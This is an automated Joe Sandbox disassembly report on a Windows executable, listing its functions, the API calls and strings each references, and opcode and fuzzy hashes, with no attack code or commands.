Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 1c508cbaee51da1533ed7ce15a27e6d18a2fe747f20aaf4a7554e0c016604479
Instruction ID: 4691b95a0a5e9e529c0eca5e46a6ec0ff5e5984461fef40e37ff8cecf8f29a80
Opcode Fuzzy Hash: 1c508cbaee51da1533ed7ce15a27e6d18a2fe747f20aaf4a7554e0c016604479
Instruction Fuzzy Hash: DF31CA7A91020AEBCB10EFE5D8859EFBBFCFF58700B04455AE955E3210EB309645CB65

Function 00B891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00B891D4
_memcmp.LIBVCRUNTIME ref: 00B891EB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9d5c6615932dd819322f0761248b9ab60e7707cab7096eb56c329c857978f970
Instruction ID: 402f149697cc77626a0f2918708cc3c61e5af2097b63260edbc257fde8031cc3
Opcode Fuzzy Hash: 9d5c6615932dd819322f0761248b9ab60e7707cab7096eb56c329c857978f970
Instruction Fuzzy Hash: D121817160420EBBDF15BE14CC81E7B77EDEB91784B1881A8FC099B222E670ED45D790

Function 00B98FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00BB0EE8,00B93E14,00BB0EE8,?,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B98FA9
_free.LIBCMT ref: 00B98FDC
_free.LIBCMT ref: 00B99004
SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B99011
SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B9901D
_abort.LIBCMT ref: 00B99023

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 9c483309cec99404130404fb9602695e7ab168c3b0308c0c3185053db5c31ce5
Instruction ID: d1655b33187d5f028bf0f3c17270e4f582c4414b757212c096801c21f3c1dc96
Opcode Fuzzy Hash: 9c483309cec99404130404fb9602695e7ab168c3b0308c0c3185053db5c31ce5
Instruction Fuzzy Hash: 64F02835504A007ACE32372C6C4BB2B29EADFD3760F2644B9F425D32A2EF21C9015060

Function 00B8D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B8D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B8D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B8D31D
TranslateMessage.USER32(?), ref: 00B8D327
DispatchMessageW.USER32(?), ref: 00B8D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B8D33C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: a619e03d9b117ba2f5630f6c31f3564cdcc891bdc61b022f6756c53616b6547d
Instruction ID: 534913e7313a94724499692e5592175404d0d67e8d9017063f5a2328a594f047
Opcode Fuzzy Hash: a619e03d9b117ba2f5630f6c31f3564cdcc891bdc61b022f6756c53616b6547d
Instruction Fuzzy Hash: 71F0E171A02119ABCB206BA5DC4DEDBBF6DEF52751F148412F506D3060EA359541C7B1

Function 00B976BD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hK8z1AmKO1.exe,00000104), ref: 00B976FD
_free.LIBCMT ref: 00B977C8
_free.LIBCMT ref: 00B977D2

Strings

`%}, xrefs: 00B97703
C:\Users\user\Desktop\hK8z1AmKO1.exe, xrefs: 00B976F4, 00B976FB, 00B9772A, 00B97762

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\hK8z1AmKO1.exe$`%}
API String ID: 2506810119-4011019921
Opcode ID: 57a54404ccbdc022765587bbf9e54e3dc3a1133cc55b355c683374afc8cde80d
Instruction ID: a65fc783abc3385dd671381e6133f41f3f6683f12f0d0135139bb5ee61bf9aa5
Opcode Fuzzy Hash: 57a54404ccbdc022765587bbf9e54e3dc3a1133cc55b355c683374afc8cde80d
Instruction Fuzzy Hash: E4316B71A55218BFDF21DF999C85D9EBBECEF85710B1440F6E80897211EA748E408BA0

Function 00B8C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00B8C435

Part of subcall function 00B817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B7BB05,00000000,.exe,?,?,00000800,?,?,00B885DF,?), ref: 00B817C2

Strings

MIN, xrefs: 00B8C4A3
HIDE, xrefs: 00B8C474
<, xrefs: 00B8C41E
MAX, xrefs: 00B8C487

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 0dabd72a6f522df48788ce86f171785a4c6c750aa250f352326953a743906a6d
Instruction ID: 1f1f108249cc17dadc3e4767c60cece557d855ca098312cb3ca24539fc601b17
Opcode Fuzzy Hash: 0dabd72a6f522df48788ce86f171785a4c6c750aa250f352326953a743906a6d
Instruction Fuzzy Hash: 623187B6900209AADF25EA94CC41FEA7BFCEB14310F0044E6F515D6161E7B09FC4CB60

Function 00B8ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00B8ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 00B8AE22
DeleteObject.GDI32(00000000), ref: 00B8AE54
DeleteObject.GDI32(00000000), ref: 00B8AE77

Part of subcall function 00B89E1C: FindResourceW.KERNEL32(00B8AE4D,PNG,?,?,?,00B8AE4D,00000066), ref: 00B89E2E
Part of subcall function 00B89E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E46
Part of subcall function 00B89E1C: LoadResource.KERNEL32(00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E59
Part of subcall function 00B89E1C: LockResource.KERNEL32(00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E64

Strings

], xrefs: 00B8AE2A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: b78fbfa983ea3d403c9f2c6917a2a8fe1f4f959663dcabb6eab5429f93649ad0
Instruction ID: 13a8f96e75b440bb3beee065e33c296975ab216b90e57108379c9cbbb3281357
Opcode Fuzzy Hash: b78fbfa983ea3d403c9f2c6917a2a8fe1f4f959663dcabb6eab5429f93649ad0
Instruction Fuzzy Hash: 2A010032541216A7DB1077649C15A7FBBEAEB81B43F180192BE00A72B1EE318C15D3B2

Function 00B8CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

EndDialog.USER32(?,00000001), ref: 00B8CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B8CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B8CD05
SetDlgItemTextW.USER32(?,00000068), ref: 00B8CD14

Strings

RENAMEDLG, xrefs: 00B8CCA8

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 80e85020749176f7302c66daecba8893eab40a59661116279d526d04c3cc27af
Instruction ID: 00551c4daef32f2e9fa0519c5402487153d735b330f5d989c55022082cab8852
Opcode Fuzzy Hash: 80e85020749176f7302c66daecba8893eab40a59661116279d526d04c3cc27af
Instruction Fuzzy Hash: F301F572285210BAD5116B649C08F57BFDDEB5AB02F104452F345A30B0CBB19905CBB5

Function 00B975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B97573,00000000,?,00B97513,00000000,00BABAD8,0000000C,00B9766A,00000000,00000002), ref: 00B975E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B975F5
FreeLibrary.KERNEL32(00000000,?,?,?,00B97573,00000000,?,00B97513,00000000,00BABAD8,0000000C,00B9766A,00000000,00000002), ref: 00B97618

Strings

mscoree.dll, xrefs: 00B975DB
CorExitProcess, xrefs: 00B975ED

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 809a9d732d41084912bbd5bed3b94718f04d012860c598bcf78fbffefcfb7163
Instruction ID: 3241b3d10d0311ed579a60dcc45128f47b45f1a041ba6b05cfc28bf789fb0090
Opcode Fuzzy Hash: 809a9d732d41084912bbd5bed3b94718f04d012860c598bcf78fbffefcfb7163
Instruction Fuzzy Hash: 56F04431A58618BBDB159B55DC0AB9DBFF9EF05B15F0440A9F805A3160DF318E44CB54

Function 00B7EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B80085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B800A0
Part of subcall function 00B80085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7EB86,Crypt32.dll,00000000,00B7EC0A,?,?,00B7EBEC,?,?,?), ref: 00B800C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B7EB92
GetProcAddress.KERNEL32(00BB81C0,CryptUnprotectMemory), ref: 00B7EBA2

Strings

Crypt32.dll, xrefs: 00B7EB7C
CryptProtectMemory, xrefs: 00B7EB8C
CryptUnprotectMemory, xrefs: 00B7EB98

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 179cb97c246de3338206ed6e5d172f531faa99b04075cb706aa69b6fdbf2b15a
Instruction ID: d945f44d24af714b75d6153f3c2adb694e7c94e25a58492fd490e60b28933145
Opcode Fuzzy Hash: 179cb97c246de3338206ed6e5d172f531faa99b04075cb706aa69b6fdbf2b15a
Instruction Fuzzy Hash: 34E04F714087419ECB309F349849B46BEE49F1AB00B04C8DDF4E6D3260DAB4D5448B50

Function 00B97DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B97E4B
_free.LIBCMT ref: 00B97E6B

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4bd19648d1308644d0fef7605636a3e651fc0f045fda32d276dcd0e7f5d3311d
Instruction ID: f5d622cc811c6571e87c7e87b1030ae7d5bf7bdab5c4d72cf4d1cddfa90d759e
Opcode Fuzzy Hash: 4bd19648d1308644d0fef7605636a3e651fc0f045fda32d276dcd0e7f5d3311d
Instruction Fuzzy Hash: EE41AD32A506049BDF24DF78C881AAEB7E6EF89714B1545F8E515EB351DB31ED01CB80

Function 00B9B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B9B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B9B63C

Part of subcall function 00B98518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B9C13D,00000000,?,00B967E2,?,00000008,?,00B989AD,?,?,?), ref: 00B9854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B9B662
_free.LIBCMT ref: 00B9B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B9B684

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: fc0f0ce414885badf171892edbff2c28a6af3a9d5f7410801b6278e2f465975f
Instruction ID: acf84861533aa7d20a5616a4b095cd3dc322f2112b1299a0fd2b9c3afbb74556
Opcode Fuzzy Hash: fc0f0ce414885badf171892edbff2c28a6af3a9d5f7410801b6278e2f465975f
Instruction Fuzzy Hash: 7B017162602315BB6B2116BA7DCDC7BAAEDDEC7FA031502B9B904D3224DF60DD0191B0

Function 00B99029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B9895F,00B985FB,?,00B98FD3,00000001,00000364,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B9902E
_free.LIBCMT ref: 00B99063
_free.LIBCMT ref: 00B9908A
SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B99097
SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B990A0

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e2e9537b83578aaa5b59d018e4ebd74c4a5b03bed58189f3b4e63d67ecff32b8
Instruction ID: b811a00e15a0e6635311d998873575c70402a7226054215607845d9bb4e734cf
Opcode Fuzzy Hash: e2e9537b83578aaa5b59d018e4ebd74c4a5b03bed58189f3b4e63d67ecff32b8
Instruction Fuzzy Hash: DE01F436605B007ADF32277C6C86A2B2AEEDFD37B132601BDF52593262EE60CC014160

Function 00B8075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00B80A41: ResetEvent.KERNEL32(?), ref: 00B80A53
Part of subcall function 00B80A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B80A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B8078F
CloseHandle.KERNEL32(?,?), ref: 00B807A9
DeleteCriticalSection.KERNEL32(?), ref: 00B807C2
CloseHandle.KERNEL32(?), ref: 00B807CE
CloseHandle.KERNEL32(?), ref: 00B807DA

Part of subcall function 00B8084E: WaitForSingleObject.KERNEL32(?,000000FF,00B80A78,?), ref: 00B80854
Part of subcall function 00B8084E: GetLastError.KERNEL32(?), ref: 00B80860

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: a44994c1dae0d58f28a80ea79a51195951c0f1ee5db38eaf7f73f0e6ed0919b3
Instruction ID: 2ad028cd8e7e0676c2552aab9d4a6c1a9547029cdce287bd986b2711dc0aff12
Opcode Fuzzy Hash: a44994c1dae0d58f28a80ea79a51195951c0f1ee5db38eaf7f73f0e6ed0919b3
Instruction Fuzzy Hash: BA01B571440B04EFC731AB69DC85FC6FBE9FB4AB50F000559F15A83160CB756A48CB90

Function 00B9BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B9BF28

Part of subcall function 00B984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?), ref: 00B984F4
Part of subcall function 00B984DE: GetLastError.KERNEL32(?,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?,?), ref: 00B98506

_free.LIBCMT ref: 00B9BF3A
_free.LIBCMT ref: 00B9BF4C
_free.LIBCMT ref: 00B9BF5E
_free.LIBCMT ref: 00B9BF70

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2de933f1d3c11de98f9c947cdde5179c0430b862983410220f356c673583c6e8
Instruction ID: 43b1c108740bc8f31c3a019b26d21d7aeefa8f0475f55aab2d9976f04c618481
Opcode Fuzzy Hash: 2de933f1d3c11de98f9c947cdde5179c0430b862983410220f356c673583c6e8
Instruction Fuzzy Hash: E4F01232504605A79E20EB68FFC6D1A77DAFE0171076548B9F058D7A20CF30FC808A74

Function 00B77574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B77579

Part of subcall function 00B73B3D: __EH_prolog.LIBCMT ref: 00B73B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B77640

Part of subcall function 00B77BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B77C04
Part of subcall function 00B77BF5: GetLastError.KERNEL32 ref: 00B77C4A
Part of subcall function 00B77BF5: CloseHandle.KERNEL32(?), ref: 00B77C59

Strings

SeRestorePrivilege, xrefs: 00B775D3
SeSecurityPrivilege, xrefs: 00B775BE

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

